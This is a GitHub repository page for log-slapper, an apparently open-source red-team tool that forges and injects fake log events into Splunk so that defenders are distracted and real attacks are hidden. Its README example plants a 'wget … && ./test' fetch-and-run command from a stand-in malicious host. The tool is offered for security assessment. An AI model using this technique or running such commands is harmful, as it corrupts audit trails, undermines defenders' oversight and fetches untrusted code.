Skip to content
/ log-slapper Public

log-slapper is an open-source offensive security tool designed for red-team operations as the post-exploit module and assessing your Splunk's security.

License

MIT license
14 stars 2 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

oz9un/log-slapper

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
pkg
pkg
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
go.mod
go.mod
 
 
go.sum
go.sum
 
 
main.go
main.go
 
 

Repository files navigation

log-slapper 👹

image


Every company undoubtedly trusts its SIEM, right? Think twice, we can inject fake logs, distract BT's and hide our attacks.

description

log-slapper is the offensive security tool for red-teamers and specifically designed for post-exploit part of the campaign.

log-slapper can:

  • mimic attacks on behalf of any other computer on the network
  • run in interactive mode: Target Shell Playzone
  • send logs from future and past: HEC based Time Traveller's attack
  • perform built-in attacks like login success/fail spam, new process creations

usage

image

go into interactive mode:

./log-slapper interactive

send log as "payment-server-01" got hacked and malicious code is running:

./log-slapper nix_command --hostname "payment-server-01" --ip "23.32.45.123" -t "e270e632-861f-45cc-8f00-f91eb895f5e6" --exectime "10/10/2021 08:45" --command "wget https://malicious.com/test && ./test"

Now check your Splunk 🙂

video

for more details on research, usage of log-slapper and more:
SIEM SLAM

About

log-slapper is an open-source offensive security tool designed for red-team operations as the post-exploit module and assessing your Splunk's security.

Resources

Readme

License

MIT license
Activity

Stars

14 stars

Watchers

1 watching

Forks

2 forks
Report repository

Releases 1

log-slapper Latest
Apr 3, 2024

Packages

No packages published

Languages